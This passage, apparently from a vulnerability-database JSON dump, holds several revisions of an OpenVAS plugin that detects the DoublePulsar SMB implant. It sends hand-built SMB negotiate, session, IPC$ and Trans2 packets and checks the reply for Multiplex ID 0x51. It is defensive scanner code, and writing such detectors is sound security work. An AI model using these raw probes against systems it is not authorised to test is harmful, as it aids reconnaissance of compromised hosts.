'0x51' in the response.\");\n\n script_tag(name:\"insight\", value:\"An SMBv1 (Server Message Block 1.0) exploit\n that could trigger a RCE in older versions of Windows dubbed as 'ETERNALBLUE'\n has been discovered in latest dump of NSA Tools. One covert channel, 'double\n pulsar', is designed to particular for systems that are vulnerable to Eternalblue.\n The covert channel uses SMB features that have so far been not used, in\n particular, the 'Trans2' feature.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code on the affected system. Failed attacks\n will cause denial of service conditions.\");\n\n script_tag(name:\"affected\", value:\"All Windows Platforms from Windows XP\n through Windows 2012\");\n\n script_tag(name:\"solution\", value:\"Run Windows Update and update the\n listed hotfixes or download and update mentioned hotfixes in the advisory\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://github.com/countercept/doublepulsar-detection-script\");\n script_xref(name:\"URL\", value:\"https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312\");\n script_xref(name:\"URL\", value:\"http://blog.binaryedge.io/2017/04/21/doublepulsar\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! 
soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42,\n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x53, 0xc0,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe,\n 0x00, 0x00, 0x40, 0x00, 0x00, 0x62, 0x00, 0x02,\n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e,\n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f,\n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,\n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70,\n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02,\n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30,\n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41,\n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,\n 0x00);\n\n## SMB Negotiate Protocol Response\nsend( socket:soc, data:smb_neg_req );\nsmb_neg_resp = smb_recv( socket:soc );\nif(strlen(smb_neg_resp) < 9 || !ord(smb_neg_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n\n## SMB Session Setup AndX Request,Anonymous User\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0x88, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe,\n 0x00, 0x00, 0x40, 0x00, 0x0d, 0xff, 0x00, 0x88,\n 0x00, 0x04, 0x11, 0x0a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0xd4, 0x00, 0x00, 0x00, 0x4b,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00,\n 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00,\n 0x77, 0x00, 0x73, 0x00, 0x20, 0x00, 0x32, 0x00,\n 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x31, 0x00, 0x39, 0x00, 0x35, 0x00,\n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 
0x00, 0x30, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2e, 0x00,\n 0x30, 0x00, 0x00, 0x00);\n\n## Session Setup AndX Response\nsend( socket:soc, data:smb_sess_req );\nsmb_sess_resp = smb_recv( socket:soc );\nif(strlen(smb_sess_resp) < 9 || !ord(smb_sess_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(strlen(smb_tree_resp) < 9 || !ord(smb_tree_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\n\n## SMB TRANS2 Request\nsmbtrans2_request = raw_string(0x00, 0x00, 0x00, 0x4e, 0xff, 0x53, 0x4d, 0x42,\n 0x32, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00) + raw_string(tid_low, tid_high) +\n raw_string(0xff, 0xfe) + raw_string(uid_low, uid_high) +\n raw_string(0x41, 0x00, 0x0f, 0x0c, 0x00, 0x00,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xa6, 0xd9, 0xa4, 0x00, 0x00, 0x00, 0x0c,\n 0x00, 0x42, 0x00, 0x00, 0x00, 0x4e, 0x00, 0x01,\n 0x00, 0x0e, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00 );\n\nsend( socket:soc, data: smbtrans2_request);\n\n##Trans2 Response, SESSION_SETUP, Error: STATUS_NOT_IMPLEMENTED\nsmb_trans2_resp = smb_recv( socket:soc );\nif(strlen(smb_trans2_resp) < 34)\n{\n close( soc );\n exit( 0 );\n}\n\n##The intent of this request is to check if the system is already compromised.\n##Infected or not, the system will respond with a \"Not Implemented\" message.\nif(smb_trans2_resp && (ord(smb_trans2_resp[9])==2 && 
ord(smb_trans2_resp[10])==0\n && ord(smb_trans2_resp[11])==0 && ord(smb_trans2_resp[12])==192))\n{\n ##As part of the message, a \"Multiplex ID\" is returned.\n ##For normal systems it is 65 (0x41) and for infected systems it is 81 (0x51).\n if(ord(smb_trans2_resp[34]) == 81)\n {\n security_message(port:smbPort );\n close(soc);\n exit(0);\n }\n}\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["modified", "sourceData"], "edition": 6, "lastseen": "2018-10-22T16:34:04"}, {"bulletin": {"id": "OPENVAS:1361412562310810698", "hash": "3f89e1e2b68ecdb7e1324587cc5cdd4f55120134c0bccf99df95907412aa3479", "type": "openvas", "bulletinFamily": "scanner", "title": "Double Pulsar Infection Detect", "description": "This host is vulnerable to ", "published": "2017-04-18T00:00:00", "modified": "2017-04-18T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810698", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://github.com/countercept/doublepulsar-detection-script"], "cvelist": ["CVE-2017-0147", "CVE-2017-0146"], "lastseen": "2017-07-02T21:14:35", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "pluginID": "1361412562310810698", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_doublepulsar_infection_detect.nasl 5972 2017-04-18 17:45:20Z veerendragg $\n#\n# Double Pulsar Infection Detect\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that 
it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810698\");\n script_version(\"$Revision: 5972 $\");\n script_cve_id(\"CVE-2017-0146\", \"CVE-2017-0147\");\n script_bugtraq_id(96707, 96709);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-18 19:45:20 +0200 (Tue, 18 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-18 15:25:17 +0530 (Tue, 18 Apr 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_name(\"Double Pulsar Infection Detect\");\n\n script_tag(name:\"summary\", value:\"This host is vulnerable to 'Eternalblue'\n tool attack and is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send an SMB trans2 session setup request\n and check for presence of Multiplex ID '0x51' in the response.\");\n\n script_tag(name:\"insight\", value:\"An SMBv1 (Server Message Block 1.0) exploit\n that could trigger a RCE in older versions of Windows dubbed as 'ETERNALBLUE'\n has been discovered in latest dump of NSA Tools. 
One covert channel, 'double\n pulsar', is designed to particular for systems that are vulnerable to Eternalblue.\n The covert channel uses SMB features that have so far been not used, in\n particular, the 'Trans2' feature.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code on the affected system. Failed attacks \n will cause denial of service conditions.\n\n Impact Level: System/Application\");\n\n script_tag(name:\"affected\", value:\"All Windows Platforms from Windows XP\n through Windows 2012\");\n\n script_tag(name:\"solution\", value:\"Run Windows Update and update the\n listed hotfixes or download and update mentioned hotfixes in the advisory\n from the below link, https://technet.microsoft.com/library/security/MS17-010\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"https://github.com/countercept/doublepulsar-detection-script\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n exit(0);\n}\n\n##\n## Code starts here\n##\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\n## Variable Initialization\nname = \"\";\nsmbPort = \"\";\nsoc = \"\";\nsmb_neg_req = \"\";\nsmb_neg_resp = \"\";\nsmb_sess_req = \"\";\nsmb_sess_resp = \"\";\nsmb_tree_resp = \"\";\nsmbtrans2_request = \"\";\nsmb_trans2_resp = \"\";\ntid_low = \"\";\ntid_high = \"\";\nuid_low = \"\";\nuid_high = \"\";\nuid = \"\";\n\n## exit, if its not windows\nif(host_runs(\"Windows\") != \"yes\") exit(0);\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\n\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! 
soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42, \n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x53, 0xc0, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe, \n 0x00, 0x00, 0x40, 0x00, 0x00, 0x62, 0x00, 0x02, \n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f, \n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52, \n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02, \n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e, \n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f, \n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57, \n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70, \n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02, \n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30, \n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, \n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54, \n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, \n 0x00);\n\nsend( socket:soc, data:smb_neg_req );\n\n## SMB Negotiate Protocol Response\nsmb_neg_resp = smb_recv( socket:soc );\nif( !smb_neg_resp || !ord(smb_neg_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n\n## SMB Session Setup AndX Request,Anonymous User\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0x88, 0xff, 0x53, 0x4d, 0x42, \n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe, \n 0x00, 0x00, 0x40, 0x00, 0x0d, 0xff, 0x00, 0x88, \n 0x00, 0x04, 0x11, 0x0a, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0xd4, 0x00, 0x00, 0x00, 0x4b, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00, \n 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, \n 0x77, 0x00, 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, \n 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x20, 0x00, \n 0x32, 0x00, 0x31, 0x00, 0x39, 0x00, 0x35, 0x00, \n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, \n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 
\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, \n 0x30, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2e, 0x00, \n 0x30, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_req );\n## Session Setup AndX Response\nsmb_sess_resp = smb_recv( socket:soc );\nif( ! smb_sess_resp || !ord(smb_neg_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\n\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(! smb_tree_resp || !ord(smb_tree_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\n\n## SMB TRANS2 Request\nsmbtrans2_request = raw_string(0x00, 0x00, 0x00, 0x4e, 0xff, 0x53, 0x4d, 0x42, \n 0x32, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00) + raw_string(tid_low, tid_high) +\n raw_string(0xff, 0xfe) + raw_string(uid_low, uid_high) +\n raw_string(0x41, 0x00, 0x0f, 0x0c, 0x00, 0x00, \n 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0xa6, 0xd9, 0xa4, 0x00, 0x00, 0x00, 0x0c, \n 0x00, 0x42, 0x00, 0x00, 0x00, 0x4e, 0x00, 0x01, \n 0x00, 0x0e, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00 );\n\nsend( socket:soc, data: smbtrans2_request);\n##Trans2 Response, SESSION_SETUP, Error: STATUS_NOT_IMPLEMENTED\nsmb_trans2_resp = smb_recv( socket:soc );\n##The intent of this request is to check if the system is already compromised.\n##Infected or not, the system will respond with a \"Not Implemented\" message.\nif(smb_trans2_resp && (ord(smb_trans2_resp[9])==2 && ord(smb_trans2_resp[10])==0\n && ord(smb_trans2_resp[11])==0 && 
ord(smb_trans2_resp[12])==192))\n{\n ##As part of the message, a \"Multiplex ID\" is returned.\n ##For normal systems it is 65 (0x41) and for infected systems it is 81 (0x51).\n if(ord(smb_trans2_resp[34]) == 81)\n {\n security_message(port:smbPort );\n close(soc);\n exit(0);\n }\n}\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["references", "modified", "sourceData"], "edition": 1, "lastseen": "2017-07-02T21:14:35"}, {"bulletin": {"id": "OPENVAS:1361412562310810698", "hash": "f965112c99785f13cf6356b9533ba7406843424d7437cad6ab973f774d3e537d", "type": "openvas", "bulletinFamily": "scanner", "title": "Double Pulsar Infection Detect", "description": "This host is vulnerable to ", "published": "2017-04-18T00:00:00", "modified": "2017-10-24T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810698", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://github.com/countercept/doublepulsar-detection-script", "http://blog.binaryedge.io/2017/04/21/doublepulsar", "https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312"], "cvelist": ["CVE-2017-0147", "CVE-2017-0146"], "lastseen": "2018-09-01T23:40:40", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810698", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_doublepulsar_infection_detect.nasl 7543 2017-10-24 11:02:02Z cfischer $\n#\n# Double Pulsar Infection Detect\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com> on 2017-06-28Fixed the validation issues.\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it 
and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810698\");\n script_version(\"$Revision: 7543 $\");\n script_cve_id(\"CVE-2017-0146\", \"CVE-2017-0147\");\n script_bugtraq_id(96707, 96709);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 13:02:02 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-18 15:25:17 +0530 (Tue, 18 Apr 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_name(\"Double Pulsar Infection Detect\");\n\n script_tag(name:\"summary\", value:\"This host is vulnerable to 'Eternalblue'\n tool attack and is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send an SMB trans2 session setup request\n and check for presence of Multiplex ID '0x51' in the response.\");\n\n script_tag(name:\"insight\", value:\"An SMBv1 (Server Message Block 1.0) exploit\n that could trigger a RCE in older versions of Windows dubbed as 'ETERNALBLUE'\n has been discovered in latest dump of NSA Tools. 
One covert channel, 'double\n pulsar', is designed to particular for systems that are vulnerable to Eternalblue.\n The covert channel uses SMB features that have so far been not used, in\n particular, the 'Trans2' feature.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code on the affected system. Failed attacks \n will cause denial of service conditions.\n\n Impact Level: System/Application\");\n\n script_tag(name:\"affected\", value:\"All Windows Platforms from Windows XP\n through Windows 2012\");\n\n script_tag(name:\"solution\", value:\"Run Windows Update and update the\n listed hotfixes or download and update mentioned hotfixes in the advisory\n from the below link, https://technet.microsoft.com/library/security/MS17-010\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"https://github.com/countercept/doublepulsar-detection-script\");\n script_xref(name : \"URL\" , value : \"https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312\");\n script_xref(name : \"URL\" , value : \"http://blog.binaryedge.io/2017/04/21/doublepulsar\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\n## Variable Initialization\nname = \"\";\nsmbPort = \"\";\nsoc = \"\";\nsmb_neg_req = \"\";\nsmb_neg_resp = \"\";\nsmb_sess_req = \"\";\nsmb_sess_resp = \"\";\nsmb_tree_resp = \"\";\nsmbtrans2_request = \"\";\nsmb_trans2_resp = \"\";\ntid_low = \"\";\ntid_high = \"\";\nuid_low = \"\";\nuid_high = \"\";\nuid = \"\";\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\nif(!name || !smbPort){\n 
exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42, \n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x53, 0xc0, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe, \n 0x00, 0x00, 0x40, 0x00, 0x00, 0x62, 0x00, 0x02, \n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f, \n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52, \n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02, \n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e, \n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f, \n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57, \n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70, \n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02, \n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30, \n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, \n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54, \n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, \n 0x00);\n\n## SMB Negotiate Protocol Response\nsend( socket:soc, data:smb_neg_req );\nsmb_neg_resp = smb_recv( socket:soc );\nif(strlen(smb_neg_resp) < 9 || !ord(smb_neg_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n\n## SMB Session Setup AndX Request,Anonymous User\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0x88, 0xff, 0x53, 0x4d, 0x42, \n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe, \n 0x00, 0x00, 0x40, 0x00, 0x0d, 0xff, 0x00, 0x88, \n 0x00, 0x04, 0x11, 0x0a, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0xd4, 0x00, 0x00, 0x00, 0x4b, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00, \n 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, \n 0x77, 0x00, 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, \n 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x20, 0x00, \n 0x32, 0x00, 0x31, 0x00, 0x39, 0x00, 0x35, 0x00, \n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 
0x6e, 0x00, \n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, \n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, \n 0x30, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2e, 0x00, \n 0x30, 0x00, 0x00, 0x00);\n\n## Session Setup AndX Response\nsend( socket:soc, data:smb_sess_req );\nsmb_sess_resp = smb_recv( socket:soc );\nif(strlen(smb_sess_resp) < 9 || !ord(smb_sess_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(strlen(smb_tree_resp) < 9 || !ord(smb_tree_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\n\n## SMB TRANS2 Request\nsmbtrans2_request = raw_string(0x00, 0x00, 0x00, 0x4e, 0xff, 0x53, 0x4d, 0x42, \n 0x32, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00) + raw_string(tid_low, tid_high) +\n raw_string(0xff, 0xfe) + raw_string(uid_low, uid_high) +\n raw_string(0x41, 0x00, 0x0f, 0x0c, 0x00, 0x00, \n 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0xa6, 0xd9, 0xa4, 0x00, 0x00, 0x00, 0x0c, \n 0x00, 0x42, 0x00, 0x00, 0x00, 0x4e, 0x00, 0x01, \n 0x00, 0x0e, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00 );\n\nsend( socket:soc, data: smbtrans2_request);\n\n##Trans2 Response, SESSION_SETUP, Error: STATUS_NOT_IMPLEMENTED\nsmb_trans2_resp = smb_recv( socket:soc );\nif(strlen(smb_trans2_resp) < 34)\n{\n close( soc );\n exit( 0 );\n}\n\n##The intent of this request is to check if the system is already compromised.\n##Infected or 